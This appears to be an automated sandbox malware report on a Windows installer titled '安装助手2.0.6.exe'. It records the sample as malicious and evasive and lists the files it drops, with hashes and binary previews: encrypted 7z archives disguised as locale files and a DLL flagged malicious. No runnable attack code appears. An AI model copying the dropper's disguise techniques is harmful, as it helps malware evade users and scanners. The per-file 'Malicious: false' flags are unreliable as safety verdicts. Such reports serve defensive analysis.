Overall analysis duration:	0h 9m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	110
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Critical Process Termination
Sample name:	#U5b89#U88c5#U52a9#U624b2.0.6.exe renamed because original name is a hash value
Original Sample Name:	2.0.6.exe
Detection:	MAL
Classification:	mal88.evad.winEXE@144/33@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 77% Number of executed functions: 28 Number of non-executed functions: 72
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: #U5b89#U88c5#U52a9#U624b2.0.6.exe

Simulations

Behavior and APIs

Time	Type	Description
07:03:12	API Interceptor	1x Sleep call for process: #U5b89#U88c5#U52a9#U624b2.0.6.tmp modified
07:03:15	API Interceptor	26x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Windows NT\7zr.exe	#U5b89#U88c5#U52a9#U624b2.0.4.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b2.0.5.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b2.0.2.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b2.0.3.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b2.0.1.exe	Get hash	malicious	Unknown	Browse
	cVyexkZjrG.exe	Get hash	malicious	Unknown	Browse
	cVyexkZjrG.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b1.0.3.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Windows NT\7zr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	831200
Entropy (8bit):	6.671005303304742
Encrypted:	false
SSDEEP:	24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5:	84DC4B92D860E8AEA55D12B1E87EA108
SHA1:	56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256:	BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512:	CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse Filename: cVyexkZjrG.exe, Detection: malicious, Browse Filename: cVyexkZjrG.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.\| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..\| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\file.bin (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	data
Category:	dropped
Size (bytes):	2410545
Entropy (8bit):	7.999922598249243
Encrypted:	true
SSDEEP:	49152:g6wAukW+yiCbwWUfNV0nkGyIjg1QzigxBeCOg227duaZIN4Zud:g6wlkW+yEWWKkTr7gxAHgtuGyqud
MD5:	22AB3F365A4BE4A19F0905AB757C3702
SHA1:	AA1FB50388CD3DBE4495A26601EFA09C7B8229EF
SHA-256:	709B2D4134B4C54CB331B0C3FA5226CC49C55AD29BC2F5548745FB213F5C0DEB
SHA-512:	460C32CE230CCA3ED396275725381DB98289B6ACD250CBD7037E2597C849924EA839C5F70B71A8FFF9A5E09C878C52FD6D29F0339F507D3F2C317660F72C5F18
Malicious:	false
Preview:	.@S....<.(.,;..............Q9:..9.....&./.}.....\|..t%.p.S\|O.C0c..i.a6..x.e...I,.r........E`....U...y.<0a.{S.....NL.U".h.gu..J8....@b...vtL.UR.......4...(..W.O.k6..s.2\|...uo.&.....,.7.i.6l.b.:..'...%........x..H...zW.\N..)9y....V....-i.....j."v.[....z.oZ.!.......y..7j..'J...U.yI.,....<.9)Q.C.z...l.....CGe:.....?%i.c$.....:).5.e!z..qs"..^&,..g....4......".P.r{.P...~...j....y...q..;.o`..[..Ef..E}e.L..1$.^x.j.5...,$v.N.1..o.....4&.bs.C.$.NN.d.+``>.4V....{0..([M....@.$.F..Cd.....C..@P.z.I+.S..-.tA?...od..B:+!.Y..>..H....cM.e/.....+.........C.v.....c....v..u..~...;.z...L..b'...f.1K<.F\|.......A,H.z..lf.)0.....l_,...W.....2....b..L.....].c...f#I.F......213....KS.K.......b..DO....Jv\|..zHh&!.qo.....[.z.1..z..A.a..=1l..}..o..9....F.2.w:F3.ca.7.d.4X)-.\|.wB......"!.3m.rt....fGM...#W...m.".L.m..t.E.....i.X.k8z..4.8..F....-.y...3,k... &..O.....T...7...A..1.b..:g....L..I.`.d.n"...{..g........f....%..r....W]a.Q......K..,..Aa....N.....6vB...9B.

C:\Program Files (x86)\Windows NT\hrsw.vbc

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3606016
Entropy (8bit):	7.0063494494702985
Encrypted:	false
SSDEEP:	49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
MD5:	95ACD5631A9131DB1FD066565AFC9A67
SHA1:	8E9473BD632FF0F57FC34EECAC17174341D80D94
SHA-256:	EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
SHA-512:	70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\is-PQ622.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	data
Category:	dropped
Size (bytes):	2410545
Entropy (8bit):	7.999922598249243
Encrypted:	true
SSDEEP:	49152:g6wAukW+yiCbwWUfNV0nkGyIjg1QzigxBeCOg227duaZIN4Zud:g6wlkW+yEWWKkTr7gxAHgtuGyqud
MD5:	22AB3F365A4BE4A19F0905AB757C3702
SHA1:	AA1FB50388CD3DBE4495A26601EFA09C7B8229EF
SHA-256:	709B2D4134B4C54CB331B0C3FA5226CC49C55AD29BC2F5548745FB213F5C0DEB
SHA-512:	460C32CE230CCA3ED396275725381DB98289B6ACD250CBD7037E2597C849924EA839C5F70B71A8FFF9A5E09C878C52FD6D29F0339F507D3F2C317660F72C5F18
Malicious:	false
Preview:	.@S....<.(.,;..............Q9:..9.....&./.}.....\|..t%.p.S\|O.C0c..i.a6..x.e...I,.r........E`....U...y.<0a.{S.....NL.U".h.gu..J8....@b...vtL.UR.......4...(..W.O.k6..s.2\|...uo.&.....,.7.i.6l.b.:..'...%........x..H...zW.\N..)9y....V....-i.....j."v.[....z.oZ.!.......y..7j..'J...U.yI.,....<.9)Q.C.z...l.....CGe:.....?%i.c$.....:).5.e!z..qs"..^&,..g....4......".P.r{.P...~...j....y...q..;.o`..[..Ef..E}e.L..1$.^x.j.5...,$v.N.1..o.....4&.bs.C.$.NN.d.+``>.4V....{0..([M....@.$.F..Cd.....C..@P.z.I+.S..-.tA?...od..B:+!.Y..>..H....cM.e/.....+.........C.v.....c....v..u..~...;.z...L..b'...f.1K<.F\|.......A,H.z..lf.)0.....l_,...W.....2....b..L.....].c...f#I.F......213....KS.K.......b..DO....Jv\|..zHh&!.qo.....[.z.1..z..A.a..=1l..}..o..9....F.2.w:F3.ca.7.d.4X)-.\|.wB......"!.3m.rt....fGM...#W...m.".L.m..t.E.....i.X.k8z..4.8..F....-.y...3,k... &..O.....T...7...A..1.b..:g....L..I.`.d.n"...{..g........f....%..r....W]a.Q......K..,..Aa....N.....6vB...9B.

C:\Program Files (x86)\Windows NT\is-V197H.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	data
Category:	dropped
Size (bytes):	2160403
Entropy (8bit):	7.999915137888149
Encrypted:	true
SSDEEP:	49152:It2n0GjjLAmAsqpaBu1j6HHY98iLNC9s0GSUCrtIQ:fImVwassHHeLmGSPtIQ
MD5:	0CEBF47D80812A6BAC25DBB7BBD2A4BA
SHA1:	60C7165E374A09465A6864964E6FCE777A6A397E
SHA-256:	A3783734750CAE6E97CF1A2FAA2E8716B6C91A9F1D05C23C1370969D01772353
SHA-512:	D39E65CD10D767937907F1EDD1AA6F1F0D73D83F852635A10C4809C0161D0634C3E8764DD019CB19DEEC7D299D5268D27154997F05675B0E061D0D1C6AC8EB8D
Malicious:	false
Preview:	.U_O..h...=...`.f5...........3...._E..M...A.P..)....8.&>..9...Uye..,.X$.^.T...$...\2.uz>H.>E........B#..y..0...k`..C..!.."}.~)..X..gR.P.....E.@l...Tr...._m..m..Pv.....7?A.Z.o#..I>..)S.1.+...........j.L.b....B.2..T. `e_..d:m.~..B..hw..S............YS..:.v`}..%...1.c.H.W.....Y....\..q....$4..+jN.,q...ra.....v".J$.9.. .}k<..cC...k%7.i+~`.....g.......m.`.3z.......tQxf...vJ:zpV..<..oi)...C....a.G.]...@E]../h..0.e.B..u......@\%.E...T..w....O...3$j.7TTK.?]a..1^/g...05;D. ...Y.&..!......f!.V.......).M..n..].[hu.).....Mc.$l}Db....\..W`...R..0.......)"....n.WR..Y.O...".r.._..>...b.z..d.......w8.,v...9.l.R.U\{..=.}.g.@........Ut.3..Y.....m.....yKz..S?.q..P.qs...il.mN<L..-]m...P..0.z\.`#]....hQL.<...\.Xa.;..V.!.....cJx.\..!t;5< E.&C.~ ;$.u..z..Ay8......#..=.+.....P..B/.'(J..L..hR.h..H.3."..&.!.{.q.....(.06...............6...........G.Oe......e=.2:AK."o#}>\|\|...!.C....n....M...7....u..=..!..~.. ......N..[Me;OFj.....^V..X5.9}#..Y&.*..".[.`...

C:\Program Files (x86)\Windows NT\locale.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	56530
Entropy (8bit):	7.996728823788979
Encrypted:	true
SSDEEP:	1536:VrioFfO629rsDfMEfSVSK8eBlsiviev1MQdQe:V9FfO6fdmSiB1R
MD5:	5A288ABE66B6DA4DB8C201C03A9ECC52
SHA1:	EBBDD65A036F97D6F934243B5987D06CB7B7E367
SHA-256:	C28544764B28D5ED1495194D2390427883D9A0E939B2B68D79C0FD4C68D78888
SHA-512:	EC0AE2FC22D214AFE200943AE9849F355BFD35355099A0B02991B87236E9626858ED96E9D05468DA3613DDFC50B04F220CB2D9E59EC04F72938C5052E3E5E82F
Malicious:	false
Preview:	.@S....93).\| ..............:I@.$c......].....<lxe...=.\Kx...X..c.HP..M.:.N.~..T#....6.#......$...w..p.n.~.8\Q.b.y.C.d..`.[../K...g..O.+..?..Qs.T..Z..E..g.6^\|..S..]z.u.......0cb.'...+.I....8.q..[>..i..f.X\|4=.Hk.q..H`MW.../..^H..>%...i.qk.i.K.[.9...$n...Q......+E..+.......rV0/E...1M>3[....."2m.g.7.).....L..'......gG..,....d..ujm........4.....GN....&.b.E.iw...`S...<..p.......D.....t..o.n.P...yt%..G..C..R..&.ps...."...~......m.%.\w.\|.'4...).9.=rE.=...7.....)..t .S.M.=....m.Q.g.....z3.2.......;./#..e.VaB...X....d..{7g.C8).y.,..c...m....r...-.>.3....0.OX...d..xR.6.h.....qH.y+. ..Bs\C..qJ...3q.~........2R.0._a.}.".....!d.....!.R.Ha...}....e.e.;Ts...F..nx.{..f.....7..v. ..X....T=.o.^].>.FU..O....j..c@Jo4!..]...%...R.`.....4."DY8....?.0!..>!..".3.b...".L.Q."..P.f.....wp.7.... .2..GY.?M....]...C.-.E...k.'f&?`........`Gm...d.[.n...v.....U.F.{(..g...R.].....o=.V...1S.k......W$..(x.'.j^..ju.=eD.N..j.~K..J...(..,....cr...G.Il{;.Yam.../j.d..

C:\Program Files (x86)\Windows NT\locale.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	56530
Entropy (8bit):	7.99672882378898
Encrypted:	true
SSDEEP:	1536:LLTAuZTNshF+E4azBIlUpDAWPl3TjoVnVVDbsSpWR2q:Lf/u+Vaz2G5AWVTcVnVVnsSoRr
MD5:	DA365B62C29AA40AB63B36267E132538
SHA1:	F98E46F576EF5B2FDA1FBCF0FFB455BB91485F0E
SHA-256:	2522BA39C177784BFEAD3D02AD9F1F778A3ECD389F1114FF41C0D2008D5A02EC
SHA-512:	8A8037AB919D4B0FA80B9AE0DD82EA1CB443E134A2893AC380F395F9F9EAB722B92446B8F4EA869A4B2C832B6F987975B593E4B42386D7B3F87251B9B74E3717
Malicious:	false
Preview:	7z..'......'........2............%M].r..-.?lS.....C6>.!.....s..^.x..sJ.....+Y....5cBN.'.{+Z;..q..&wo....8.`....Z.4.N.u...j.9..5.j..b.F.T..=...t..A..adB.\|3....i..j{....yt.&.C.Rw..o..O....RB:..I.gS..Mc.T..f.......N........8..cv.......@/9.....^.j....(.O.i.F.<.~.....w.Q.^.4JQ+I....\|......R...9..\|.Q.m...%.Q.....5..3.....A.b.!.d..kV...b...&..-.gI.W m....:..E. .-..=.s%s..<m..b0.Gce.....At...E.........C...rR./.P .j.....1.hn..)\|..}3.d6....l..G.s...'>`.P.....f.3,2\..,..L......<...?..f^;@.U.....z.w.....j0<V..X...I..p=.......#.}.X;..5h{....../n...-..s=\|...8.....M._...+l....G.....0x.,N...gV........G.H......w...'K^.....8.).XR......-.4.V..H..pX.h'.B.t..i6>.d0`.9.%.i..?.>.i....Q..m.)..k=......E3*..F.Z..1....dn..h.x.^......U..!.`...}....-..=.).......~..AC..4['M...q..E:...v.7.g=..N....Og..o..B.iK.L.H3..b./ N",...O.).n..o8.$...N#.x...\|S...Q...x.}..v`w.....Y..q./.....u.;V...-.NjgSD...._'2....#>.^..Y...a.>...s..-...h.f~.#g..<..r...O..IHhS....V.g......\.....0...6.

C:\Program Files (x86)\Windows NT\locale2.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	56546
Entropy (8bit):	7.996966859255975
Encrypted:	true
SSDEEP:	1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5:	CEA69F993E1CE0FB945A98BF37A66546
SHA1:	7114365265F041DA904574D1F5876544506F89BA
SHA-256:	E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512:	4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious:	false
Preview:	.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.\|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~.....'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z\|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p..bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm....E....2........s. R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

C:\Program Files (x86)\Windows NT\locale2.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	56546
Entropy (8bit):	7.996966859255979
Encrypted:	true
SSDEEP:	1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
MD5:	4CB8B7E557C80FC7B014133AB834A042
SHA1:	C42E2C861FF3ED0E6A11824E12F67A344E8F783D
SHA-256:	3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
SHA-512:	A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
Malicious:	false
Preview:	7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..\|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.\|. a.:..5.....b.....2......W.....Z.pS.b/.F.;\|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f........@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..\| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..\|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

C:\Program Files (x86)\Windows NT\locale3.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	31890
Entropy (8bit):	7.99402458740637
Encrypted:	true
SSDEEP:	768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
MD5:	8622FC7228777F64A47BD6C61478ADD9
SHA1:	9A7C15F341835F83C96DA804DC1E21FDA696BB56
SHA-256:	4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
SHA-512:	71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
Malicious:	false
Preview:	.@S......................xi.\ .~.#..:}..fy?koGL^\|kH.G...........x....Tg.Y.t....~^..".L.41.....R..\|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.\|a.]..@DP".`Rz}...\|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........\|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C.......V..\|..2.J..i.r....\|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ...8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

C:\Program Files (x86)\Windows NT\locale3.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	31890
Entropy (8bit):	7.99402458740637
Encrypted:	true
SSDEEP:	768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
MD5:	CE6034AFC63BB42F4E0D6CD897DFBCB8
SHA1:	49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
SHA-256:	7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
SHA-512:	7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
Malicious:	false
Preview:	7z..'....oYU@\|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc.o@\|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB\|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

C:\Program Files (x86)\Windows NT\locale4.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	74960
Entropy (8bit):	7.99759370165655
Encrypted:	true
SSDEEP:	1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
MD5:	950338D50B95A25F494EE74E97B7B7A9
SHA1:	F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
SHA-256:	87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
SHA-512:	9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
Malicious:	false
Preview:	.@S........................F.T....r...z'I.N..].u.e.e..y.....<\|r.:v.....J.i...L.Sv.....Nz..,..K.sI./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X\|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.......9;..R...VL.]..%j.....TM.4.....P.L...

C:\Program Files (x86)\Windows NT\locale4.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	74960
Entropy (8bit):	7.997593701656546
Encrypted:	true
SSDEEP:	1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
MD5:	059BA7C31F3E227356CA5F29E4AA2508
SHA1:	FA3DC96A3336903ED5E6105A197A02E618E3F634
SHA-256:	1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
SHA-512:	E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
Malicious:	false
Preview:	7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7....!!.(.....Gc..........Dg....Z..#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.\|T.5..V...E\|...q.........].}bl...y.....;...q....-a..RP3..L~k....\|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

C:\Program Files (x86)\Windows NT\locale7.bin

Download File

